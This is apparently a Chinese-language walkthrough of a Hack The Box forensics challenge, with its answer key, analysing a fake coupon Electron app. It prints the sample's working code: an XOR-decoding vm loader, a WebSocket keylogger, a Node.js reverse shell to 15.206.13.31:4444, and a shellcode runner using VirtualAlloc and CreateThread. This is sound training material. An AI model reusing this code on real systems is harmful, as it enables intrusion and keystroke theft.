HTB-OpSalwarKameez24-1 Super-Star

场景

StoreD Technologies' customer support team operates tirelessly around the clock in 24/7 shifts to meet customer needs. During the Diwali season, employees have been receiving genuine discount coupons as part of the celebrations. However, this also presented an opportunity for a threat actor to distribute fake discount coupons via email to infiltrate the organization's network. One of the employees received a suspicious email, triggering alerts for enumeration activities following a potential compromise. The malicious activity was traced back to an unusual process. The Incident Response Team has extracted the malicious binaries and forwarded them to the reverse engineering team for further analysis. This is a warning that this Sherlock includes software that is going to interact with your computer and files. This software has been intentionally included for educational purposes and is NOT intended to be executed or used otherwise. Always handle such files in isolated, controlled, and secure environments. One the Sherlock zip has been unzipped, you will find a DANGER.txt file. Please read this to proceed.

题目

1. What is the process name of malicious NodeJS application?

2. Which option has the attacker enabled in the script to run the malicious Node.js application?

3. What protocol and port number is the attacker using to transmit the victim's keystrokes?

4. What XOR key is the attacker using to decode the encoded shellcode?

5. What is the IP address, port number and process name encoded in the attacker payload ?

6. What are the two commands the attacker executed after gaining the reverse shell?

7. Which Node.js module and its associated function is the attacker using to execute the shellcode within V8 Virtual Machine contexts?

8. Decompile the bytecode file included in the package and identify the Win32 API used to execute the shellcode.

在虚拟机中解压附件，得到Electron-Coupon（这里的翻译为电子优惠卷）可执行程序和opsk1.pcap这个流量包，我们根据题目背景可以推断出攻击者的攻击路径为利用虚假的电子优惠卷exe进行钓鱼，之后进行后渗透利用

根据恶意可执行文件的名称，我们可以猜测它是使用Electron框架进行构建的

Electron是一个用于构建跨平台桌面应用程序的开源框架，它基于Chromium（浏览器内核）和Node.js（后端运行时），允许开发者使用HTML、CSS 和 JavaScript来创建桌面应用。

我们循着这个思路可以猜测攻击者利用Electron-builder里的打包工具对载荷进行打包，我们之后需要对Electron-Coupon进行解包

关于如何识别Electron打包程序

将exe后缀改为zip，然后尝试利用解压缩文件打开，然后观察压缩文件中是不是存在resources目录，目录下有一个app.asar文件，满足这些条件说明这是一个Electron打包程序

利用https://github.com/electron/asar/这个工具解包，需要配置npm环境

观察zip中存在可执行程序，我们直接解压提取出来exe和dll

很明显恶意行为的产生是来自程序Coupon.exe

之后我们在resources目录下找到app.asar，我们利用上面提到的工具进行解包

asar e Electron-Coupon.exe ./unpacked

asar文件结构中重要的部分解释如下：

package.json：Electron应用的配置文件，包含应用名称、入口文件、依赖项、脚本等信息。

extraResources：存放外部资源（不会被打包进 app.asar），例如额外的配置文件（.json、.yaml），图片、音频、视频等媒体文件等，存放 preload.js 预加载脚本，存放第三方二进制文件（如 Python、Go、Rust 生成的可执行文件）

node_modules：是Node.js项目中用于存放所有安装的依赖包的文件夹，所有的第三方库都会被下载到 node_modules 目录中

public：通常用于存放 静态资源，例如 HTML、CSS、JavaScript 文件，以及图片、字体等

这个打包文件的配置文件如下：

{
  "name": "Coupon",
  "version": "1.0.0",
  "description": "",
  "main": "index.js",
  "author": "",
  "license": "ISC",
  "dependencies": {
    "bytenode": "^1.5.6",
    "ffi-napi": "^4.0.3",
    "ref-napi": "^3.0.3"
  },
  "postinstall": "electron-builder install-app-deps"
}

我们在index.js下找到项目入口文件

const { app, BrowserWindow } = require('electron');
const { exec } = require('child_process');
const fs = require('fs');
const path = require('path');

let mainWindow = '';
//const powershell = fs.readFileSync(`C:\\Users\\Public\\test.txt`, 'utf8', data => data);

function createWindow() {
    mainWindow = new BrowserWindow({ width: 800, height: 600,
	  webPreferences: {
		contextIsolation: false,
		nodeIntegration: true,
		nodeIntegrationInWorker: true,
		preload: path.resolve(`${process.resourcesPath}/../extraResources/preload.js`)
	}});
    mainWindow.loadFile(`${__dirname}/public/testPage.html`);
    mainWindow.on('closed', () => {
        mainWindow = null;
    });
}
//path.resolve(`${__dirname}/preload.js`)
//fork(powershell);

app.on('ready', createWindow);

app.on('window-all-closed', () => process.platform !== 'darwin' && app.quit());
// re-create a window on mac
app.on('activate', () => mainWindow === null && createWindow());

上面的代码主要用于创建一个窗口，但是里面隐藏了用于RCE的不安全配置

contextIsolation: false：关闭上下文隔离，会让 preload 脚本和 web 页面运行在相同的 JavaScript 作用域中从而可以直接修改 window 对象

nodeIntegration: true：允许 Electron 的渲染进程直接使用 Node.js API，这意味着网页中的 JavaScript 代码可以访问 Node.js 模块，具有极高的权限，会导致RCE

nodeIntegrationInWorker: true：允许 Web Workers（网页工作线程）中也能使用 Node.js API

preload: path.resolve()：在网页加载前执行的预加载脚本

下面是preload.js 脚本

typeof require === 'function';

window.runShell = function(){
var http = require('http')
var vm = require("vm");
var fs = require("fs");

var options = {
  host: '0.0.0.0',
  port: 80,
  path: '/'
};

http.get(options, function(res) {
  var body = '';
  res.on('data', function(chunk) {
    body += chunk;
  });
  res.on('end', function() {
	
	var b64string = "xHiVWo9qiVuCNslP4RTAFMw+llWePo5RmD7dFJ57kUGFbIUcznCFQM43zDnmPsAUzD7AFMx9kBTRPpJRnWuJRok2wleEd4xQs26SW497k0fON8w55j7AFMw+wBTMbYgU0T6DRMJtkFWbcMgWj3OEGolmhRbAPrtpxSXtPsw+wBSaf5IUj3KJUYJqwAnMcIVDzHCFQMJNj1eHe5QcxSXtPsw+wBSPcolRgmrOV4NwjlGPasgA2CrUGMw80QHCLNACwi/TGt8vwhjMeJVaj2qJW4I2yU/hFMAUzD7AFMw+g1iFe45Awm6JRIk2k1zCbZRQhXDJD+EUwBTMPsAUzD6TXMJtlFCDa5QanHeQUcR9jF2JcJQd1xPqFMw+wBTMPsBHhDCTQIh7kkbCbolEiTaDWIV7jkDFJe0+zD7AFJE32znmPsAUzGyFQJlsjhTDf88PzDHPFLxshUKJcJRHzGqIUcxQj1CJMIpHzH+QRIB3g1WYd49azHiPRoE+g0aNbYhdgnntPpE3yB3X";
	
	var str = Buffer.from(b64string, 'base64');

	let keyBuf = Buffer.from(body, 'hex')
	let strBuf = Buffer.from(str, 'hex')
	let outBuf = Buffer.alloc(strBuf.length)

	for (let n = 0; n < strBuf.length; n++)
		outBuf[n] = strBuf[n] ^ keyBuf[n % keyBuf.length]

	//console.log(outBuf.toString())
	var code = outBuf.toString()
	var script = new vm.Script(code);
	var context = vm.createContext({ require: require });

	script.runInNewContext(context);
	
  });
}).on('error', function(e) {
  console.log("Got error: " + e.message);
});
};

简单分析可知预加载脚本的作用是从远程服务器获取异或密钥，解密一个 Base64 编码的字符串，并执行解密后的 JavaScript 代码

在public目录下存放了攻击者用来进行钓鱼的页面

但是这里的账户和密码在输入之后的处理程序却是一个keylogger，具体代码如下

typeof require === 'undefined';
runShell();

if ("WebSocket" in window)
{
  var socket = new WebSocket("ws://0.0.0.0:44500");
  var all_input_fields = document.getElementsByTagName("input");
  var page_url = document.baseURI;
  var now = Date();

  socket.onopen = function()
  {
    if (all_input_fields.length > 0)
    {
      socket.send("\n\n --------------- " + now + " --------------- ");
      socket.send("\nURL: " + page_url + "\n");
      var all = "";

      for (var i = 0; i < all_input_fields.length; i++)
      {
        if ((all_input_fields[i].type.toLowerCase() == "text") || (all_input_fields[i].type.toLowerCase() == "password"))
        {
          all_input_fields[i].onfocus = function()
          {
            socket.send("\n##########\n" + this.name + " --> ");
          }

          all_input_fields[i].onkeydown = function(sniffed_key)
          {
            socket.send(sniffed_key.keyCode);
          }
        }
      }
    }
  }

  socket.onbeforeunload = function()
  {
    socket.close();
  }
}

监听网页上的文本输入框和密码输入框的按键输入，并通过 WebSocket 将按键数据发送到远程服务器（ws://0.0.0.0:44500），实现键盘记录

接下来打开流量包，我们寻找一下异或的密钥，这里因为密钥传输使用的是HTTP协议，我们过滤一下HTTP流量，在GET请求的返回包中我们找到密钥ec1ee034ec1ee034

我们利用cyberchef解密一下shellcode

完整的shellcode如下，实际上就是一个Node.js的反弹shell，我们可以简单的提取出攻击者服务器IP和开放端口

(function(){
    var net = require("net"),
        cp = require("child_process"),
        sh = cp.spawn("cmd.exe", []);
    var client = new net.Socket();
    client.connect(4444, "15.206.13.31", function(){
        client.pipe(sh.stdin);
        sh.stdout.pipe(client);
        sh.stderr.pipe(client);
    });
    return /a/; // Prevents the Node.js application form crashing
})();

在获取的流量包中追踪TCP流，查找攻击者执行的命令

恶意代码在Nodejs的vm模块下的runInNewContext函数中执行

我们尝试反编译一下public目录下的字节码文件script.jsc，我们将利用view8

JSC 文件 是JavaScript 编译文件，通常是 JavaScript 代码的 字节码版本。这些文件可以由 JavaScript 引擎（如 V8、JavaScriptCore）生成，用于提升代码执行效率，或者保护源代码免遭直接查看。

python view8.py C:\Users\lenovo\Desktop\Electron-Coupon\resources\unpacked\extraResources\script.jsc script.txt

反编译之后的代码如下

function func_unknown()
{
	r0 = func_unknown_0000035410FDD9D1
	return func_unknown_0000035410FDD9D1
}
function func_unknown_0000035410FDD9D1(a0, a1, a2, a3, a4)
{
	r0 = a1("ffi-napi")
	r1 = a1("ref-napi")
	r15 = new [252, 72, 129, 228, 240, 255, 255, 255, 232, 208, 0, 0, 0, 65, 81, 65, 80, 82, 81, 86, 72, 49, 210, 101, 72, 139, 82, 96, 62, 72, 139, 82, 24, 62, 72, 139, 82, 32, 62, 72, 139, 114, 80, 62, 72, 15, 183, 74, 74, 77, 49, 201, 72, 49, 192, 172, 60, 97, 124, 2, 44, 32, 65, 193, 201, 13, 65, 1, 193, 226, 237, 82, 65, 81, 62, 72, 139, 82, 32, 62, 139, 66, 60, 72, 1, 208, 62, 139, 128, 136, 0, 0, 0, 72, 133, 192, 116, 111, 72, 1, 208, 80, 62, 139, 72, 24, 62, 68, 139, 64, 32, 73, 1, 208, 227, 92, 72, 255, 201, 62, 65, 139, 52, 136, 72, 1, 214, 77, 49, 201, 72, 49, 192, 172, 65, 193, 201, 13, 65, 1, 193, 56, 224, 117, 241, 62, 76, 3, 76, 36, 8, 69, 57, 209, 117, 214, 88, 62, 68, 139, 64, 36, 73, 1, 208, 102, 62, 65, 139, 12, 72, 62, 68, 139, 64, 28, 73, 1, 208, 62, 65, 139, 4, 136, 72, 1, 208, 65, 88, 65, 88, 94, 89, 90, 65, 88, 65, 89, 65, 90, 72, 131, 236, 32, 65, 82, 255, 224, 88, 65, 89, 90, 62, 72, 139, 18, 233, 73, 255, 255, 255, 93, 62, 72, 141, 141, 32, 1, 0, 0, 65, 186, 76, 119, 38, 7, 255, 213, 73, 199, 193, 0, 0, 0, 0, 62, 72, 141, 149, 14, 1, 0, 0, 62, 76, 141, 133, 25, 1, 0, 0, 72, 49, 201, 65, 186, 69, 131, 86, 7, 255, 213, 72, 49, 201, 65, 186, 240, 181, 162, 86, 255, 213, 67, 79, 85, 80, 79, 78, 49, 51, 51, 55, 0, 80, 65, 87, 78, 69, 68, 0, 117, 115, 101, 114, 51, 50, 46, 100, 108, 108, 0]
	r2 = "Buffer"["from"](r15)
	r6 = r1["refType"](r1["types"]["void"])
	r7 = r1["refType"](r1["types"]["void"])
	r8 = r1["refType"](r1["types"]["uint32"])
	r15 = new {"VirtualAlloc": null, "RtlMoveMemory": null, "CreateThread": null, "WaitForSingleObject": null}
	r17 = new [0, 0]
	r17[0] = r7
	r19 = new [0, 0, 0, 0]
	r19[0] = r7
	r19[1] = r1["types"]["uint64"]
	r19[2] = r1["types"]["uint32"]
	r19[3] = r1["types"]["uint32"]
	r17[1] = r19
	r15["VirtualAlloc"] = r17
	r17 = new [0, 0]
	r17[0] = r1["types"]["void"]
	r19 = new [0, 0, 0]
	r19[0] = r7
	r19[1] = r7
	r19[2] = r1["types"]["uint64"]
	r17[1] = r19
	r15["RtlMoveMemory"] = r17
	r17 = new [0, 0]
	r17[0] = r6
	r19 = new ["pointer", 0, 0, 0, 0, 0]
	r19[1] = r1["types"]["uint64"]
	r19[2] = r7
	r19[3] = r7
	r19[4] = r1["types"]["uint32"]
	r19[5] = r8
	r17[1] = r19
	r15["CreateThread"] = r17
	r17 = new [0, 0]
	r17[0] = r1["types"]["uint32"]
	r19 = new [0, 0]
	r19[0] = r6
	r19[1] = r1["types"]["uint32"]
	r17[1] = r19
	r15["WaitForSingleObject"] = r17
	ACCU = r0["Library"]
	r9 = r0["Library"]("kernel32", r15)
	ACCU = "console"["log"]("shellcode length:", r2["length"])
	r14 = r9
	r10 = r9["VirtualAlloc"](null, r2["length"], 12288, 64)
	ACCU = "console"["log"](r10)
	r14 = r9
	r15 = r10
	r16 = r2
	ACCU = r9["RtlMoveMemory"](r15, r16, r2["length"])
	r15 = r1["refType"](r1["types"]["uint32"])
	r11 = r1["alloc"](r15)
	r14 = r9
	r17 = r10
	r20 = r11
	r12 = r9["CreateThread"](null, 0, r17, null, 0, r20)
	r16 = r11["readUint32LE"]()
	ACCU = "console"["log"]("thread id:", r16)
	ACCU = r9["WaitForSingleObject"](r12, 4294967295.0)
	return undefined
}

这段代码是反编译的 JavaScript 代码，主要利用 ffi-napi 和 ref-napi 进行Windows API 调用，最终实现了动态分配内存、写入 shellcode 并执行。

ffi-napi：用于调用Windows API函数。

ref-napi：用于创建C 语言类型，帮助与 Windows API 交互。

很容易猜测我们的shellcode就在r15这个数组中，我们将机器码转换为ASCII码

üHäðÿÿÿèÐAQAPRQVH1ÒeH‹R`>H‹R>H‹R >H‹rP>H·JJM1ÉH1À¬<a|, AÁÉ
A
ÁâíRAQ>H‹R >‹B<H
Ð>‹€ˆH…ÀtoH
ÐP>‹H>D‹@ I
Ðã\HÿÉ>A‹4ˆH
ÖM1ÉH1À¬AÁÉ
A
Á8àuñ>LL$E9ÑuÖX>D‹@$I
Ðf>A‹H>D‹@I
Ð>A‹ˆH
ÐAXAX^YZAXAYAZHƒì ARÿàXAYZ>H‹éIÿÿÿ]>H 
AºLw&ÿÕIÇÁ>H•
>L…
H1ÉAºEƒVÿÕH1ÉAºðµ¢VÿÕCOUPON1337PAWNEDuser32.dll

从中可以看到COUPON1337和user32.dll等有意义字符串

Task Answer

Coupon.exe

nodeintegration

websocket, 44500

ec1ee034ec1ee034

15.206.13.31, 4444, cmd.exe

whoami, ipconfig

vm, runInNewContext

CreateThread

COUPON1337